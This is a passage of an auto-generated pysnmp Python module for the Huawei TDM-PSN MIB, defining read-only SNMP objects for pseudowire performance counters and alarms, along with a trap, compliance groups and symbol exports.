hwTdmPsnPerfCurrentMisorderDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 6), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentMisorderDropped.setStatus('current')
hwTdmPsnPerfCurrentMalformedPkts = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentMalformedPkts.setStatus('current')
hwTdmPsnPerfCurrentErrorSeconds = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentErrorSeconds.setStatus('current')
hwTdmPsnPerfCurrentSeverelyErrorSeconds = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentSeverelyErrorSeconds.setStatus('current')
hwTdmPsnPerfCurrentUnavailableSeconds = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentUnavailableSeconds.setStatus('current')
hwTdmPsnPerfCurrentFailureCounts = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 11), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentFailureCounts.setStatus('current')
hwTdmPsnAlarmTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 2), )
if mibBuilder.loadTexts: hwTdmPsnAlarmTable.setStatus('current')
hwTdmPsnAlarmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 2, 1), ).setIndexNames((0, "HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmPwIdIndex"), (0, "HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmPwTypeIndex"))
if mibBuilder.loadTexts: hwTdmPsnAlarmEntry.setStatus('current')
hwTdmPsnAlarmPwIdIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 2, 1, 1), Unsigned32())
if mibBuilder.loadTexts: hwTdmPsnAlarmPwIdIndex.setStatus('current')
hwTdmPsnAlarmPwTypeIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 2, 1, 2), HWL2VpnVcEncapsType())
if mibBuilder.loadTexts: hwTdmPsnAlarmPwTypeIndex.setStatus('current')
hwTdmPsnAlarmPwStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 6))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnAlarmPwStatus.setStatus('current')
hwTdmPsnAlarmVcIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 2, 1, 4), InterfaceIndex()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnAlarmVcIfIndex.setStatus('current')
hwTdmPsnMIBTraps = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 2))
hwTdmPsnAlarmTrap = NotificationType((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 2, 1)).setObjects(("HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmPwStatus"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmVcIfIndex"))
if mibBuilder.loadTexts: hwTdmPsnAlarmTrap.setStatus('current')
hwTdmPsnMIBConformance = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 3))
hwTdmPsnMIBCompliances = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 3, 1))
hwTdmPsnMIBCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 3, 1, 1)).setObjects(("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentGroup"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmGroup"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwTdmPsnMIBCompliance = hwTdmPsnMIBCompliance.setStatus('current')
hwTdmPsnMIBGroups = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 3, 2))
hwTdmPsnPerfCurrentGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 3, 2, 1)).setObjects(("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentMissingPkts"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentPktsReorder"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentJtrBfrUnderruns"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentMisorderDropped"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentMalformedPkts"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentErrorSeconds"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentSeverelyErrorSeconds"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentUnavailableSeconds"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentFailureCounts"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwTdmPsnPerfCurrentGroup = hwTdmPsnPerfCurrentGroup.setStatus('current')
hwTdmPsnAlarmGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 3, 2, 2)).setObjects(("HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmPwStatus"), ("HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmVcIfIndex"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwTdmPsnAlarmGroup = hwTdmPsnAlarmGroup.setStatus('current')
hwTdmPsnNotificationGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 3, 2, 3)).setObjects(("HUAWEI-TDM-PSN-MIB", "hwTdmPsnAlarmTrap"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
hwTdmPsnNotificationGroup = hwTdmPsnNotificationGroup.setStatus('current')
mibBuilder.exportSymbols("HUAWEI-TDM-PSN-MIB", hwTdmPsnAlarmPwIdIndex=hwTdmPsnAlarmPwIdIndex, hwTdmPsnPerfCurrentPktsReorder=hwTdmPsnPerfCurrentPktsReorder, hwTdmPsnMIBCompliances=hwTdmPsnMIBCompliances, hwTdmPsnPerfCurrentSeverelyErrorSeconds=hwTdmPsnPerfCurrentSeverelyErrorSeconds, hwTdmPsnPerfCurrentGroup=hwTdmPsnPerfCurrentGroup, hwTdmPsnPerfCurrentFailureCounts=hwTdmPsnPerfCurrentFailureCounts, hwTdmPsnPerfCurrentMissingPkts=hwTdmPsnPerfCurrentMissingPkts, PYSNMP_MODULE_ID=hwTdmPsnMIB, hwTdmPsnAlarmTrap=hwTdmPsnAlarmTrap, hwTdmPsnAlarmTable=hwTdmPsnAlarmTable, hwTdmPsnMIBGroups=hwTdmPsnMIBGroups, hwTdmPsnPerfCurrentUnavailableSeconds=hwTdmPsnPerfCurrentUnavailableSeconds, hwTdmPsnPerfCurrentPwIdIndex=hwTdmPsnPerfCurrentPwIdIndex, hwTdmPsnMIBCompliance=hwTdmPsnMIBCompliance, hwTdmPsnAlarmEntry=hwTdmPsnAlarmEntry, hwTdmPsnAlarmPwStatus=hwTdmPsnAlarmPwStatus, hwTdmPsnPerfCurrentEntry=hwTdmPsnPerfCurrentEntry, hwTdmPsnPerfCurrentTable=hwTdmPsnPerfCurrentTable, hwTdmPsnMIBObjects=hwTdmPsnMIBObjects, hwTdmPsnPerfCurrentMisorderDropped=hwTdmPsnPerfCurrentMisorderDropped, hwTdmPsnPerfCurrentMalformedPkts=hwTdmPsnPerfCurrentMalformedPkts, hwTdmPsnNotificationGroup=hwTdmPsnNotificationGroup, hwTdmPsnPerfCurrentJtrBfrUnderruns=hwTdmPsnPerfCurrentJtrBfrUnderruns, hwTdmPsnMIB=hwTdmPsnMIB, hwTdmPsnPerfCurrentPwTypeIndex=hwTdmPsnPerfCurrentPwTypeIndex, hwTdmPsnMIBTraps=hwTdmPsnMIBTraps, hwTdmPsnAlarmPwTypeIndex=hwTdmPsnAlarmPwTypeIndex, hwTdmPsnAlarmVcIfIndex=hwTdmPsnAlarmVcIfIndex, hwTdmPsnMIBConformance=hwTdmPsnMIBConformance, hwTdmPsnPerfCurrentErrorSeconds=hwTdmPsnPerfCurrentErrorSeconds, hwTdmPsnAlarmGroup=hwTdmPsnAlarmGroup)
| 126.708861
| 1,648
| 0.777522
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.